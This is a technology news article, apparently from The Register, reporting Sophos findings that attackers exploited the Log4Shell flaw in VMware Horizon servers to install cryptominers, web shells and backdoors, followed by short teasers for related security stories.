VMware Horizon platform pummeled by Log4j-fueled attacks

Miscreants deployed cryptominers, backdoors since late December, Sophos says

VMware's Horizon virtualization platform has become an ongoing target of attackers exploiting the high-profile Log4j flaw to install backdoors and cryptomining malware.

In a report this week, cybersecurity firm Sophos wrote that VMware's virtual desktop and applications platform has been in the crosshairs since late December, with the largest wave of attacks beginning Jan. 19 and continuing well into March. Many of the attacks are designed to deploy cryptocurrency mining malware, Sophos researchers Gabor Szappanos and Sean Gallagher wrote.

Other motives were less clear, though some may be used by ransomware groups or initial access brokers, who gain access into targeted systems and then sell that access to threat actors to launch ransomware and other malware attacks.

VMware in late December released an updated version of Horizon and continued with patches for Horizon this month for the Log4j flaw – called Log4Shell and tracked as CVE-2021-44228 – but the threat continues.

"Attempts to compromise Horizon servers are among the more targeted exploits of Log4Shell vulnerabilities because of their nature," the researchers wrote. "VMware has pushed out patched versions of Horizon as of March 8 2022, but many organizations may still not have deployed the fixed versions or applied workarounds to vulnerable ones. Even if they have, as demonstrated by the backdoors and reverse shell activity we found, those systems may already be compromised in other ways."

The Log4j critical flaw exploded onto the scene late last year, with cybercriminals moving in quickly to exploit the vulnerability.

The threat from Log4Shell is significant – it has broad enterprise use in countless servers, cloud-based services and open-source projects like ElasticSearch and Elastic Logstash.

The open-source logging tool is so ubiquitous that it's difficult for organizations to track down every instance in their IT environments. Log4Shell is also a flaw that is easy to exploit, with hackers only needing a string of malicious code to make their way into systems.

The attacks on Horizon also come as demand for such remote-work tools continues to grow in the wake of the COVID-19 pandemic, which forced most employees to work from home and has ushered in an expected era of more hybrid work.

"Organizations should thoroughly research their exposure to potential Log4J vulnerabilities, as they may impact commercial, open-source and custom software that in some cases may not have regular security support," Szappanos and Gallagher wrote. "But platforms such as Horizon are particularly attractive targets to all types of malicious actors because they are widespread and can (if still vulnerable) easily be found and exploited with well-tested tools."

According to Sophos, the attacks on VMware Horizon that started in January used the Lightweight Directory Access Protocol resource call in Log4j for a malicious Java class file that modified legitimate Java code. That added a web shell that delivered remote access and code execution capabilities to the attackers.

The initial attacks in late December 2021 and January of this year exploiting the Log4j flaw used Cobalt Strike malware. Other hackers didn't use reverse-shell software, instead directly targeting the Tomcat server inside of Horizon.

Sophos said it had found a variety of payloads deployed to the targeted Horizon servers. Many were cryptominers, including z0Miner, JavaX miner and at least two variants of XMRig, called the "Jin" and "Mimu" miner bots.

"There were also several backdoors – including the Sliver implant, Atera agent and Splashtop Streamer (both legitimate software products being abused), and several PowerShell-based reverse shells," the researchers wrote.

"While z0Miner, JavaX, and some other payloads were downloaded directly by the web shells used for initial compromise, the Jin bots were tied to use of Sliver, and used the same wallets as Mimo – suggesting these three malware were used by the same actor."

There were also a number of backdoors deployed that used the Log4j flaw, including some PowerShell reverse shells. The motives of the bad actors using the reverse shells were unclear. One Sophos customer was hit by both reverse shells and the Mimu miner, but the researchers said that could be multiple infections by different hackers that were initially put in by an initial access broker.

Other cases showed more off-the-shelf backdoors being used to create a persistent presence in the targeted servers. That includes the Sliver implant, which the researchers described as an offensive security tool that was designed to be used by penetration testers and organizations' red teams for training by mirroring tactics used by cybercriminals. Instead, threat actors use the software in their attacks.

Casey Ellis, founder and CTO at Bugcrowd, told The Register that cryptominers were among the first malicious actors to exploit Log4Shell after it became public.

"It's a relatively simple and low-risk attack that works best with a large number of vulnerable endpoints in the attack surface," Ellis said. "Cybercriminals are businesses in their own right, and combining cryptomining as a criminal monetization technique with a vulnerable package and the ubiquity of Log4j makes perfect sense.

"The primary consequences for an organization are CPU resource shortages caused by mining activity and, for those using the cloud, an unexpectedly high usage bill."

In addition, because such attacks are simple to carry out, the threat actors using cryptomining range from individuals through ransomware-as-a-service gangs, initial access brokers and nation-states, which use cryptomining as a financing tool. ®

Other stories you might like

  • Ditching VMware over the Broadcom buy? Here are some of your options
    What's your contingency plan?

    Opinion Broadcom has yet to close the deal on taking over VMware, but the industry is already awash with speculation and analysis as to how the event could impact the cloud giant's product availability and pricing.

    If Broadcom's track record and stated strategy tell us anything, we could soon see VMware refocus its efforts on its top 600 customers and raise prices, and leave thousands more searching for an alternative.

    The jury is still out as to whether Broadcom will repeat the past or take a different approach. But, when it comes to VMware's ESXi hypervisor, customer concern is valid. There aren't many vendor options that can take on VMware in this arena, Forrester analyst Naveen Chhabra, tells The Register.

    Continue reading
  • DeadBolt ransomware takes another shot at QNAP storage
    Keep boxes updated and protected to avoid a NAS-ty shock

    QNAP is warning users about another wave of DeadBolt ransomware attacks against its network-attached storage (NAS) devices – and urged customers to update their devices' QTS or QuTS hero operating systems to the latest versions.

    The latest outbreak – detailed in a Friday advisory – is at least the fourth campaign by the DeadBolt gang against the vendor's users this year. According to QNAP officials, this particular run is encrypting files on NAS devices running outdated versions of Linux-based QTS 4.x, which presumably have some sort of exploitable weakness.

    The previous attacks occurred in January, March, and May.

    Continue reading
  • Unpatched Exchange server, stolen RDP logins... How miscreants get BlackCat ransomware on your network
    Microsoft details this ransomware-as-a-service

    Two of the more prolific cybercriminal groups, which in the past have deployed such high-profile ransomware families as Conti, Ryuk, REvil and Hive, have started adopting the BlackCat ransomware-as-as-service (RaaS) offering.

    The use of the modern Rust programming language to stabilize and port the code, the variable nature of RaaS, and growing adoption by affiliate groups all increase the chances that organizations will run into BlackCat – and have difficulty detecting it – according to researchers with the Microsoft 365 Defender Threat Intelligence Team.

    In an advisory this week, Microsoft researchers noted the myriad capabilities of BlackCat, but added the outcome is always the same: the ransomware is deployed, files are stolen and encrypted, and victims told to either pay the ransom or risk seeing their sensitive data leaked.

    Continue reading
  • Emotet malware gang re-emerges with Chrome-based credit card heistware
    Crimeware groups are re-inventing themselves

    The criminals behind the Emotet botnet – which rose to fame as a banking trojan before evolving into spamming and malware delivery – are now using it to target credit card information stored in the Chrome web browser.

    Once the data – including the user's name, the card's numbers and expiration information – is exfiltrated, the malware will send it to command-and-control (C2) servers that are different than the one that the card stealer module uses, according to researchers with cybersecurity vendor Proofpoint's Threat Insight team.

    The new card information module is the latest illustration of Emotet's Lazarus-like return. It's been more than a year since Europol and law enforcement from countries including the United States, the UK and Ukraine tore down the Emotet actors' infrastructure in January 2021 and – they hoped – put the malware threat to rest.

    Continue reading

Biting the hand that feeds IT © 1998–2022